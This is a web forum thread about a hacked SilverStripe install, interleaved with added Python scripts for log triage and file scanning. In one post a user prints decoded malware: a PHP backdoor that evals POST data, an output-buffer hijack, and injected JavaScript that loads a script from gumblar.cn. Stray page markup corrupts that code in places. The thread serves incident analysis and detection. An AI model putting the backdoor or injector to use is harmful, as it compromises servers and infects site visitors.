SilverStripe Forums » Blog Module » BUG + HACK standard install WARNING - Blog "image.php" identical duplicates created in blog|cms|sapphire /images/

  • Ingo
    Forum Moderator
    801 Posts

    Re: BUG + HACK standard install WARNING - Blog "image.php" identical duplicates created in blog|cms|sapphire /images/

    > I also discovered that all the HTML files outside the Silverstripe installation had also been modified on the same date, as well as a the javascript ".js" files

    Hm, could be a sign that the actual hack came from somewhere else, although not a very strong indicator. I've looked through the log files provided by Hugo in the timeframe in question (both apache access and error); nothing suspicious comes up. The server is a shared environment, so other installed applications might have been the cause of the hack; it's hard to tell. For now, that's all we can do - we can't find any direct evidence that the hack was caused by a SilverStripe vulnerability.
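The log review described above can be partly automated. The script below is an added example, not code from the thread or from SilverStripe: it parses Apache combined-format access log lines and flags requests to PHP files that sit inside the /images/ directories named in the thread title, treating a POST to such a file as the strongest signal. The image directory list and the sample log lines are constructed assumptions for the example.

```python
"""Added example: triage Apache access logs for PHP files served out of
image directories, the pattern this thread describes. Not from the thread."""
import re
from datetime import datetime

# Apache "combined" format: host, ident, user, [timestamp], "request", status, size, "referer", "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Assumption for this example: the image directories from the thread title.
IMAGE_DIRS = ("/blog/images/", "/cms/images/", "/sapphire/images/")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    # Drop the query string so "/cms/images/image.php?c=1" is still seen as a .php hit.
    entry["file"] = entry["path"].split("?", 1)[0]
    entry["when"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return entry


def classify(entry):
    """Return a reason string when a request looks like traffic to a dropped PHP file, else None."""
    f = entry["file"]
    if any(f.startswith(d) for d in IMAGE_DIRS) and f.endswith(".php"):
        if entry["method"] == "POST":
            return "POST to a PHP file inside an images directory"
        return "PHP file served from an images directory"
    return None


def suspicious_requests(lines):
    """Walk the log lines and collect the flagged requests with their reasons."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reason = classify(entry)
        if reason:
            hits.append({
                "ip": entry["ip"],
                "when": entry["when"].isoformat(),
                "method": entry["method"],
                "file": entry["file"],
                "reason": reason,
            })
    return hits


# Constructed sample log lines (documentation-range addresses, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2009:03:14:01 +0000] "GET /blog/images/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2009:03:14:05 +0000] "GET /blog/ HTTP/1.1" 200 8120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [12/Mar/2009:03:20:44 +0000] "POST /sapphire/images/image.php HTTP/1.1" 200 17 "-" "Mozilla/4.0"',
    '198.51.100.23 - - [12/Mar/2009:03:21:02 +0000] "GET /cms/images/image.php?c=1 HTTP/1.1" 200 17 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [12/Mar/2009:03:25:00 +0000] "POST /blog/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit["when"], hit["ip"], hit["method"], hit["file"], "-", hit["reason"])
```

Run it against a real log with `suspicious_requests(open("access.log"))`; extend `IMAGE_DIRS` to any directory that should only ever serve static assets.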

  • stayatplay
    Community Member
    13 Posts

    Re: BUG + HACK standard install WARNING - Blog "image.php" identical duplicates created in blog|cms|sapphire /images/

    It's only shared insofar as other web sites hosted by Hostway are likely on the same machine. Each account is completely separate from any other.

    The only large, complex software installed is Silverstripe; the hack happened shortly after I installed it. Silverstripe malfunctioned while I was online using it, which is why I noticed the hack happening. Likely the html files and the rest were changed by a script - the same script that the php files in Silverstripe were propagating, since everything has the same date/time for the modified date.

    Someone good at php has to look at the php code and analyze what it actually does. I decoded some of it below, making it easier to read.

    The javascript injected directs clients to that web site in China - maybe to make a "map" of ip addresses of exploitable non-Vista Windows machines for a botnet, for example. It's highly unlikely that something outside of Silverstripe caused this first, since Silverstripe is the only complex PHP code that was compromised and it includes the ability to write on the server.

    Here is the HACK of the php code in Silverstripe - easier to read.

    <?php

       if( !function_exists('--THE_HACK--') )
       {
          
             if(isset($_POST['--THE_HACK_NR_3--'])) eval($_POST['--THE_HACK_NR_3--']);
             
             
             if(!defined('--THE_JAVASCRIPT_HACK--')) define
                (
                   '--THE_JAVASCRIPT_HACK--',
                   
                   "
                      <script language=javascript><!--
                      (
                         function(CqPA)
                         {
                                     // if using this browser combination Windows, but not Vista, (navigator.userAgent.indexOf("Win")>0) && (navigator.userAgent.indexOf("NT 6")<0)
                                     // and the cookie is not set, (&& (document.cookie.indexOf("miek=1")<0) )
                                     // Then write this once in the document...
                                     // <script src=//gumblar.cn/rss/?id=""><\/script>
                         }
                      )
                       --></script>
                   "
                
                 );
          
          
             function --THE_HACK--($s)
             {
             
                if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
                
                if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5)
                {
                
                   $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
                   if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
                
                }
                
                
                $s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
                
                if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',--THE_JAVASCRIPT_HACK--.'\1',$s1);
                elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

             (function($) {
                $(document).ready(function() {
                   var popupElements = $('a.fancy');
                   if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
                });
             })(jQuery);
          

    //]]></script>'))$s=$s1.--THE_JAVASCRIPT_HACK--;
                return $g?gzencode($s):$s;
             
             }
          
          
             function --THE_HACK_NR_2--($a=0,$b=0,$c=0,$d=0)
             {
                
                $s=array();
                
                if($b&&$GLOBALS['--THE_JAVASCRIPT_HACK--'])call_user_func($GLOBALS['--THE_JAVASCRIPT_HACK--'],$a,$b,$c,$d);
                foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='--THE_HACK--')return;
                else $s[]=array($a=='default output handler'?false:$a);
                
                for($i=count($s)-1;$i>=0;$i--)
                {
                   $s[$i][1]=ob_get_contents();
                   ob_end_clean();
                }
             
                ob_start('--THE_HACK--');
             
                for($i=0;$i<count($s);$i++)
                {
                ob_start($s[$i][0]);
                echo $s[$i][1];
                }
             
             }

       
       }

       if ( ($a=@set_error_handler('--THE_HACK_NR_2--'))!='--THE_HACK_NR_2--')
          $GLOBALS['--THE_JAVASCRIPT_HACK--']=$a;
       --THE_HACK_NR_2--();

    ?>

    <?php echo("\n"); ?>
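The post above works from two observations: every touched file shares one modification date, and the decoded injector has a handful of recognisable text features (eval of request data, gzinflate of the output buffer, an output-buffer callback installed through set_error_handler, and a protocol-relative script tag pointing at the domain quoted in the comments). The script below is an added example, not the poster's or SilverStripe's code: it walks a web root, reports clusters of files modified in the same minute, and flags files carrying those indicators. The sample tree it builds, the indicator names and the burst threshold are constructed assumptions for the example.

```python
"""Added example: triage a web root for a mass-modification burst and for the
textual indicators visible in the decoded injector. Not from the thread."""
import os
import re
import tempfile
from collections import defaultdict
from datetime import datetime

# Indicators for PHP files, drawn from the decoded code in the thread.
PHP_INDICATORS = {
    "eval of request data": re.compile(r"eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    "gzinflate of raw buffer": re.compile(r"gzinflate\s*\("),
    "output-buffer hook via error handler": re.compile(
        r"ob_start\s*\(.*?\bset_error_handler\s*\(|set_error_handler\s*\(.*?\bob_start\s*\(", re.S),
}
# Indicators for HTML/JS files, drawn from the injected markup described in the thread.
WEB_INDICATORS = {
    "protocol-relative remote script": re.compile(r"<script[^>]*\ssrc=//", re.I),
    "known injector domain (from the thread)": re.compile(r"gumblar\.cn", re.I),
    "document.write(unescape(...)) loader": re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I),
}
PHP_EXT = (".php", ".inc")
WEB_EXT = (".html", ".htm", ".js")


def indicators_for(name, text):
    """Return the indicator names that match this file's text, based on its extension."""
    lower = name.lower()
    if lower.endswith(PHP_EXT):
        table = PHP_INDICATORS
    elif lower.endswith(WEB_EXT):
        table = WEB_INDICATORS
    else:
        return []
    return [reason for reason, rx in table.items() if rx.search(text)]


def scan_tree(root, burst_threshold=3):
    """Return (flagged, bursts): flagged is a sorted list of (relpath, reasons);
    bursts lists (minute, [relpaths]) for minutes in which burst_threshold or
    more files were modified, which is what a scripted mass infection looks like."""
    flagged, by_minute = [], defaultdict(list)
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            minute = datetime.fromtimestamp(os.path.getmtime(full)).strftime("%Y-%m-%d %H:%M")
            by_minute[minute].append(rel)
            try:
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: still counted in the mtime clusters above
            reasons = indicators_for(name, text)
            if reasons:
                flagged.append((rel, reasons))
    bursts = [(m, sorted(files)) for m, files in by_minute.items() if len(files) >= burst_threshold]
    return sorted(flagged), sorted(bursts)


def build_sample_tree():
    """Constructed fixture: three files touched in the same minute that carry the
    indicators (the PHP one is deliberately not a working file), plus one clean
    file with an older modification time."""
    root = tempfile.mkdtemp(prefix="webroot-")
    files = {
        "sapphire/images/image.php": (
            "<?php\n// constructed fixture mirroring the indicators, not a working file\n"
            "$h = 'eval($_POST[\"k\"])';\n$s = gzinflate(substr($s, 10, -8));\n"
            "set_error_handler('h'); ob_start('h');\n"
        ),
        "index.html": '<html><head><title>x</title></head>\n<body>hi</body>'
                      '<script src=//gumblar.cn/rss/?id=""></script></html>\n',
        "js/site.js": "document.write(unescape('%3Cscript%3E'));\n",
        "cms/README.txt": "unrelated clean file\n",
    }
    infected_at = datetime(2009, 5, 1, 3, 14, 0).timestamp()
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
        stamp = infected_at if rel != "cms/README.txt" else infected_at - 30 * 86400
        os.utime(full, (stamp, stamp))
    return root


if __name__ == "__main__":
    flagged, bursts = scan_tree(build_sample_tree())
    for minute, files in bursts:
        print("burst at", minute, "->", files)
    for rel, reasons in flagged:
        print(rel, "->", ", ".join(reasons))
```

Point `scan_tree` at a real document root to get the same two views: which minute the bulk edit happened in (compare it with the access log for that window) and which files carry the injector's fingerprints.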

  • stayatplay
    Community Member
    13 Posts

    Re: BUG + HACK standard install WARNING - Blog "image.php" identical duplicates created in blog|cms|sapphire /images/

    Well ain't that funny... I just noticed that a whole bunch of silverstripe.org SERVER CODE is being spit into the comments I posted between the CODE tags... *THAT* is a bug, for sure.

    Look at these 3 forum pages and do a search for "silverstripe.org" so you can see what I mean.
    I didn't notice earlier because I had just posted the code, so I didn't read through it.

    But it's BAD news for Silverstripe.
    Glad we noticed it though, so it can be fixed.

    -Hugo.
    P.S. The actual HACK code in easier-to-read format is attached in this post.

  • Ingo
    Forum Moderator
    801 Posts

    Re: BUG + HACK standard install WARNING - Blog "image.php" identical duplicates created in blog|cms|sapphire /images/

    I've filed a ticket for the bug you discovered in the forum code - it seems not very critical, as it doesn't execute any serverside code, just includes markup in the wrong place that would show on the page anyway: http://open.silverstripe.com/ticket/4026. Let me know if you get any PHP or javascript code being executed in the "code" tag, because that would be quite a sensitive issue. Use security /at/ silverstripe /dot/ com for this.

    > Someone good at php has to look at the php code and analyze what it actually does. I decoded some of it below, making it easier to read.

    While that's good to see what the attack actually does, it's not helpful to find out how this code got there in the first place. We couldn't find anything relating to this in the logs, so posting the attack code won't help us in the investigation, sorry.
